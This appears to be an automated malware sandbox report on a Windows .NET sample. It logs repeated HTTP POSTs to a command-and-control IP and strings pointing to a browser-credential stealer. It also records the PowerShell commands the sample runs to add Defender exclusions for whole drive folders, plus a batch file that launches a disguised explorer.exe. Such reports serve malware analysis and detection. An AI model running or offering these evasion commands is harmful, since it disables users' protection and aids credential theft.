                    Source: global trafficHTTP traffic detected: POST /Process2Dump3/Geo3Game/Windowsjs_/7/linePacketprocessorauthSqlBasewindowsWordpressTemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 45.88.91.89Content-Length: 2568Expect: 100-continueConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: POST /Process2Dump3/Geo3Game/Windowsjs_/7/linePacketprocessorauthSqlBasewindowsWordpressTemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 45.88.91.89Content-Length: 2568Expect: 100-continue
                    Source: global trafficHTTP traffic detected: POST /Process2Dump3/Geo3Game/Windowsjs_/7/linePacketprocessorauthSqlBasewindowsWordpressTemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 45.88.91.89Content-Length: 2568Expect: 100-continueConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: POST /Process2Dump3/Geo3Game/Windowsjs_/7/linePacketprocessorauthSqlBasewindowsWordpressTemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 45.88.91.89Content-Length: 1456Expect: 100-continueConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: POST /Process2Dump3/Geo3Game/Windowsjs_/7/linePacketprocessorauthSqlBasewindowsWordpressTemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 45.88.91.89Content-Length: 2568Expect: 100-continueConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: POST /Process2Dump3/Geo3Game/Windowsjs_/7/linePacketprocessorauthSqlBasewindowsWordpressTemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 45.88.91.89Content-Length: 2568Expect: 100-continue
                    Source: global trafficHTTP traffic detected: POST /Process2Dump3/Geo3Game/Windowsjs_/7/linePacketprocessorauthSqlBasewindowsWordpressTemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 45.88.91.89Content-Length: 2568Expect: 100-continueConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: POST /Process2Dump3/Geo3Game/Windowsjs_/7/linePacketprocessorauthSqlBasewindowsWordpressTemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 45.88.91.89Content-Length: 2568Expect: 100-continueConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: POST /Process2Dump3/Geo3Game/Windowsjs_/7/linePacketprocessorauthSqlBasewindowsWordpressTemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 45.88.91.89Content-Length: 1456Expect: 100-continueConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: POST /Process2Dump3/Geo3Game/Windowsjs_/7/linePacketprocessorauthSqlBasewindowsWordpressTemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 45.88.91.89Content-Length: 2564Expect: 100-continueConnection: Keep-Alive
                    Source: global traffic HTTP traffic detected: POST /Process2Dump3/Geo3Game/Windowsjs_/7/linePacketprocessorauthSqlBasewindowsWordpressTemporary.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 45.88.91.89 Content-Length: 1428 Expect: 100-continue Connection: Keep-Alive
                    Source: global traffic HTTP traffic detected: POST /Process2Dump3/Geo3Game/Windowsjs_/7/linePacketprocessorauthSqlBasewindowsWordpressTemporary.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 45.88.91.89 Content-Length: 2552 Expect: 100-continue Connection: Keep-Alive
                    Source: global traffic HTTP traffic detected: POST /Process2Dump3/Geo3Game/Windowsjs_/7/linePacketprocessorauthSqlBasewindowsWordpressTemporary.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 45.88.91.89 Content-Length: 1456 Expect: 100-continue
                    Source: global traffic HTTP traffic detected: POST /Process2Dump3/Geo3Game/Windowsjs_/7/linePacketprocessorauthSqlBasewindowsWordpressTemporary.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 45.88.91.89 Content-Length: 2564 Expect: 100-continue
                    Source: global trafficHTTP traffic detected: POST /Process2Dump3/Geo3Game/Windowsjs_/7/linePacketprocessorauthSqlBasewindowsWordpressTemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 45.88.91.89Content-Length: 2568Expect: 100-continueConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: POST /Process2Dump3/Geo3Game/Windowsjs_/7/linePacketprocessorauthSqlBasewindowsWordpressTemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 45.88.91.89Content-Length: 2568Expect: 100-continueConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: POST /Process2Dump3/Geo3Game/Windowsjs_/7/linePacketprocessorauthSqlBasewindowsWordpressTemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 45.88.91.89Content-Length: 2568Expect: 100-continueConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: POST /Process2Dump3/Geo3Game/Windowsjs_/7/linePacketprocessorauthSqlBasewindowsWordpressTemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 45.88.91.89Content-Length: 1456Expect: 100-continueConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: POST /Process2Dump3/Geo3Game/Windowsjs_/7/linePacketprocessorauthSqlBasewindowsWordpressTemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 45.88.91.89Content-Length: 2568Expect: 100-continueConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: POST /Process2Dump3/Geo3Game/Windowsjs_/7/linePacketprocessorauthSqlBasewindowsWordpressTemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 45.88.91.89Content-Length: 2568Expect: 100-continue
                    Source: global trafficHTTP traffic detected: POST /Process2Dump3/Geo3Game/Windowsjs_/7/linePacketprocessorauthSqlBasewindowsWordpressTemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 45.88.91.89Content-Length: 2568Expect: 100-continueConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: POST /Process2Dump3/Geo3Game/Windowsjs_/7/linePacketprocessorauthSqlBasewindowsWordpressTemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 45.88.91.89Content-Length: 2568Expect: 100-continueConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: POST /Process2Dump3/Geo3Game/Windowsjs_/7/linePacketprocessorauthSqlBasewindowsWordpressTemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 45.88.91.89Content-Length: 2568Expect: 100-continueConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: POST /Process2Dump3/Geo3Game/Windowsjs_/7/linePacketprocessorauthSqlBasewindowsWordpressTemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 45.88.91.89Content-Length: 2568Expect: 100-continue
                    Source: global trafficHTTP traffic detected: POST /Process2Dump3/Geo3Game/Windowsjs_/7/linePacketprocessorauthSqlBasewindowsWordpressTemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 45.88.91.89Content-Length: 2564Expect: 100-continue
                    Source: global trafficHTTP traffic detected: POST /Process2Dump3/Geo3Game/Windowsjs_/7/linePacketprocessorauthSqlBasewindowsWordpressTemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 45.88.91.89Content-Length: 2568Expect: 100-continueConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: POST /Process2Dump3/Geo3Game/Windowsjs_/7/linePacketprocessorauthSqlBasewindowsWordpressTemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 45.88.91.89Content-Length: 2568Expect: 100-continue
                    Source: global trafficHTTP traffic detected: POST /Process2Dump3/Geo3Game/Windowsjs_/7/linePacketprocessorauthSqlBasewindowsWordpressTemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 45.88.91.89Content-Length: 2568Expect: 100-continue
                    Source: global trafficHTTP traffic detected: POST /Process2Dump3/Geo3Game/Windowsjs_/7/linePacketprocessorauthSqlBasewindowsWordpressTemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 45.88.91.89Content-Length: 2564Expect: 100-continueConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: POST /Process2Dump3/Geo3Game/Windowsjs_/7/linePacketprocessorauthSqlBasewindowsWordpressTemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 45.88.91.89Content-Length: 1456Expect: 100-continueConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: POST /Process2Dump3/Geo3Game/Windowsjs_/7/linePacketprocessorauthSqlBasewindowsWordpressTemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 45.88.91.89Content-Length: 2568Expect: 100-continueConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: POST /Process2Dump3/Geo3Game/Windowsjs_/7/linePacketprocessorauthSqlBasewindowsWordpressTemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 45.88.91.89Content-Length: 2568Expect: 100-continue
                    Source: global trafficHTTP traffic detected: POST /Process2Dump3/Geo3Game/Windowsjs_/7/linePacketprocessorauthSqlBasewindowsWordpressTemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 45.88.91.89Content-Length: 2568Expect: 100-continue
                    Source: global trafficHTTP traffic detected: POST /Process2Dump3/Geo3Game/Windowsjs_/7/linePacketprocessorauthSqlBasewindowsWordpressTemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 45.88.91.89Content-Length: 2568Expect: 100-continueConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: POST /Process2Dump3/Geo3Game/Windowsjs_/7/linePacketprocessorauthSqlBasewindowsWordpressTemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 45.88.91.89Content-Length: 2568Expect: 100-continue
                    Source: global trafficHTTP traffic detected: POST /Process2Dump3/Geo3Game/Windowsjs_/7/linePacketprocessorauthSqlBasewindowsWordpressTemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 45.88.91.89Content-Length: 1456Expect: 100-continue
                    Source: global trafficHTTP traffic detected: POST /Process2Dump3/Geo3Game/Windowsjs_/7/linePacketprocessorauthSqlBasewindowsWordpressTemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 45.88.91.89Content-Length: 2568Expect: 100-continue
                    Source: global trafficHTTP traffic detected: POST /Process2Dump3/Geo3Game/Windowsjs_/7/linePacketprocessorauthSqlBasewindowsWordpressTemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 45.88.91.89Content-Length: 2568Expect: 100-continueConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: POST /Process2Dump3/Geo3Game/Windowsjs_/7/linePacketprocessorauthSqlBasewindowsWordpressTemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 45.88.91.89Content-Length: 2564Expect: 100-continueConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: POST /Process2Dump3/Geo3Game/Windowsjs_/7/linePacketprocessorauthSqlBasewindowsWordpressTemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 45.88.91.89Content-Length: 2568Expect: 100-continueConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: POST /Process2Dump3/Geo3Game/Windowsjs_/7/linePacketprocessorauthSqlBasewindowsWordpressTemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 45.88.91.89Content-Length: 1428Expect: 100-continueConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: POST /Process2Dump3/Geo3Game/Windowsjs_/7/linePacketprocessorauthSqlBasewindowsWordpressTemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 45.88.91.89Content-Length: 2564Expect: 100-continueConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: POST /Process2Dump3/Geo3Game/Windowsjs_/7/linePacketprocessorauthSqlBasewindowsWordpressTemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 45.88.91.89Content-Length: 2568Expect: 100-continue
                    Source: global trafficHTTP traffic detected: POST /Process2Dump3/Geo3Game/Windowsjs_/7/linePacketprocessorauthSqlBasewindowsWordpressTemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 45.88.91.89Content-Length: 2568Expect: 100-continueConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: POST /Process2Dump3/Geo3Game/Windowsjs_/7/linePacketprocessorauthSqlBasewindowsWordpressTemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 45.88.91.89Content-Length: 2568Expect: 100-continueConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: POST /Process2Dump3/Geo3Game/Windowsjs_/7/linePacketprocessorauthSqlBasewindowsWordpressTemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 45.88.91.89Content-Length: 2568Expect: 100-continueConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: POST /Process2Dump3/Geo3Game/Windowsjs_/7/linePacketprocessorauthSqlBasewindowsWordpressTemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 45.88.91.89Content-Length: 2568Expect: 100-continue
                    Source: global trafficHTTP traffic detected: POST /Process2Dump3/Geo3Game/Windowsjs_/7/linePacketprocessorauthSqlBasewindowsWordpressTemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 45.88.91.89Content-Length: 2568Expect: 100-continueConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: POST /Process2Dump3/Geo3Game/Windowsjs_/7/linePacketprocessorauthSqlBasewindowsWordpressTemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 45.88.91.89Content-Length: 2568Expect: 100-continueConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: POST /Process2Dump3/Geo3Game/Windowsjs_/7/linePacketprocessorauthSqlBasewindowsWordpressTemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 45.88.91.89Content-Length: 1456Expect: 100-continueConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: POST /Process2Dump3/Geo3Game/Windowsjs_/7/linePacketprocessorauthSqlBasewindowsWordpressTemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 45.88.91.89Content-Length: 2568Expect: 100-continueConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: POST /Process2Dump3/Geo3Game/Windowsjs_/7/linePacketprocessorauthSqlBasewindowsWordpressTemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 45.88.91.89Content-Length: 2568Expect: 100-continue
                    Source: global trafficHTTP traffic detected: POST /Process2Dump3/Geo3Game/Windowsjs_/7/linePacketprocessorauthSqlBasewindowsWordpressTemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 45.88.91.89Content-Length: 2568Expect: 100-continueConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: POST /Process2Dump3/Geo3Game/Windowsjs_/7/linePacketprocessorauthSqlBasewindowsWordpressTemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 45.88.91.89Content-Length: 2568Expect: 100-continueConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: POST /Process2Dump3/Geo3Game/Windowsjs_/7/linePacketprocessorauthSqlBasewindowsWordpressTemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 45.88.91.89Content-Length: 1428Expect: 100-continueConnection: Keep-Alive
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.88.91.89
                    Source: unknownHTTP traffic detected: POST /Process2Dump3/Geo3Game/Windowsjs_/7/linePacketprocessorauthSqlBasewindowsWordpressTemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 45.88.91.89Content-Length: 344Expect: 100-continueConnection: Keep-Alive
                    Source: powershell.exe, 00000016.00000002.2499675027.000001DE00228000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                    Source: powershell.exe String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
                    Source: CPNSQusnwC.exe, powershell.exe String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                    Source: powershell.exe String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
                    Source: powershell.exe, 00000016.00000002.2499675027.000001DE00228000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                    Source: powershell.exe String found in binary or memory: https://aka.ms/pscore68
                    Source: powershell.exe, 00000016.00000002.2499675027.000001DE00228000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                    Source: powershell.exeProcess created: 44

                    System Summary

                    Source: CPNSQusnwC.exe, s67.csLong String: Length: 1085332
                    Source: Joe Sandbox ViewDropped File: C:\Users\user\Desktop\AxLDtRxd.log AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
                    Source: CPNSQusnwC.exe, 00000000.00000002.2202046245.0000000013410000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameBrowsersStealer_native.dll" vs CPNSQusnwC.exe
                    Source: CPNSQusnwC.exe, 00000000.00000002.2215989480.000000001BA22000.00000002.00000001.01000000.00000000.sdmpBinary or memory string: OriginalFilenameq944h9VdeekiaLj6nIEA0nxdMfYwMGO54 vs CPNSQusnwC.exe
                    Source: CPNSQusnwC.exe, 00000000.00000000.2115602177.00000000009D2000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameVisualStudio.Shell.Framework.dll$ vs CPNSQusnwC.exe
                    Source: CPNSQusnwC.exe, 00000000.00000002.2217050443.000000001BB96000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCmd.Exe.MUIj% vs CPNSQusnwC.exe
                    Source: CPNSQusnwC.exe, 00000000.00000002.2217050443.000000001BB96000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCmd.Exej% vs CPNSQusnwC.exe
                    Source: CPNSQusnwC.exe, 00000000.00000002.2186892873.0000000002DA0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameBrowsersStealer_native.dll" vs CPNSQusnwC.exe
                    Source: CPNSQusnwC.exeBinary or memory string: OriginalFilenameVisualStudio.Shell.Framework.dll$ vs CPNSQusnwC.exe
                    Source: CPNSQusnwC.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                    Source: CPNSQusnwC.exe, E32.csCryptographic APIs: 'TransformBlock'
                    Source: CPNSQusnwC.exe, E32.csCryptographic APIs: 'TransformFinalBlock'
                    Source: CPNSQusnwC.exe, E32.csCryptographic APIs: 'TransformFinalBlock', 'TransformBlock'
                    Source: CPNSQusnwC.exe, s67.cs Base64 encoded string
                    Source: CPNSQusnwC.exe, 8B6.csBase64 encoded string: 'H4sIAAAAAAAEAMsoKSkottLXzyzIzEvL18vM188qzs8DACTOYY8WAAAA', 'H4sIAAAAAAAACssoKSkottLXTyzI1Mss0CtO0k9Pzc8sAABsWDNKFwAAAA=='
                    Source: CPNSQusnwC.exe, 76n.cs Base64 encoded string
                    Source: CPNSQusnwC.exe, 7YK.cs Base64 encoded string
                    Source: CPNSQusnwC.exe, 52Z.cs Base64 encoded string
                    Source: classification engineClassification label: mal100.troj.evad.winEXE@82/143@0/1
                    Source: C:\Users\user\Desktop\CPNSQusnwC.exeFile created: C:\Users\user\Desktop\bvfQbQIf.log
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7616:120:WilError_03
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeMutant created: \Sessions\1\BaseNamedObjects\Local\5f4504307f363e68f0558d6ac524302b9a3972a38384428f8af4023ee520bec9
                    Source: C:\Users\user\Desktop\CPNSQusnwC.exeFile created: C:\Users\user\AppData\Local\Temp\Oa0Kaz5Bd7
                    Source: C:\Users\user\Desktop\CPNSQusnwC.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\qWYjuUdv6Q.bat"
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe
                    Source: CPNSQusnwC.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: CPNSQusnwC.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.79%
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\Desktop\CPNSQusnwC.exeFile read: C:\Users\desktop.ini
                    Source: C:\Users\user\Desktop\CPNSQusnwC.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                    Source: CPNSQusnwC.exeReversingLabs: Detection: 76%
                    Source: C:\Users\user\Desktop\CPNSQusnwC.exeFile read: C:\Users\user\Desktop\CPNSQusnwC.exe
                    Source: unknownProcess created: C:\Users\user\Desktop\CPNSQusnwC.exe "C:\Users\user\Desktop\CPNSQusnwC.exe"
                    Source: C:\Users\user\Desktop\CPNSQusnwC.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/'
                    Source: C:\Users\user\Desktop\CPNSQusnwC.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/$Recycle.Bin/'
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\Desktop\CPNSQusnwC.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/$WinREAgent/'
                    Source: C:\Users\user\Desktop\CPNSQusnwC.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Documents and Settings/'
                    Source: C:\Users\user\Desktop\CPNSQusnwC.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/PerfLogs/'
                    Source: C:\Users\user\Desktop\CPNSQusnwC.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files/'
                    Source: C:\Users\user\Desktop\CPNSQusnwC.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files (x86)/'
                    Source: C:\Users\user\Desktop\CPNSQusnwC.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/ProgramData/'
                    Source: C:\Users\user\Desktop\CPNSQusnwC.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Recovery/'
                    Source: C:\Users\user\Desktop\CPNSQusnwC.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/System Volume Information/'
                    Source: C:\Users\user\Desktop\CPNSQusnwC.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Users/'
